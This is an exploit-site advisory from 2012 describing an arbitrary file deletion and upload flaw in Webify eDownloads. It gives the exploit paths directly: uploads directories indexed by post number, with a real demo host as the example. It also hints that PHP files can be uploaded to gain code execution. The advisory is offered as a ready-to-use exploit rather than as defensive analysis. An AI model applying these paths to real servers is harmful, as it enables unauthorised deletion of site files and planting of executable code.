Webify eDownloads Delete Arbitrary File Vulnerability

2012.09.12

Credit: JIKO

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#############################
[!x!] Informations:
  
Name           : Webify Blog
Download       : http://www.webify.ws/blog

Vulnerability  : Delete Arbitrary File Vulnerability
Author         : JIKO(JAWAD)
Contact        : jalikom@hotmail.com

Site           : No-ExploiT.CoM (Is Back)
Notes          : No-ExploiT.CoM Miss
#############################
[!x!] Bug: Delete Arbitrary File Vulnerability 
  
you can delete file uploaded in post and upload your files (for php if allowed you can :))

  
#############################
[!x!] Exploit:
  
Exploit: 
http://server/edownloadscart/uploads/X/
http://server/edownloads/uploads/X/


change X with number of post 

 exemple:
http://demo.webify.ws/edownloadscart/uploads/8/

  
############################
[!x!] To: All friends
Cyber_Devil Allah with you
 
members [No-exploit.Com] 

References:

http://No-exploit.Com

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Webify eDownloads Delete Arbitrary File Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.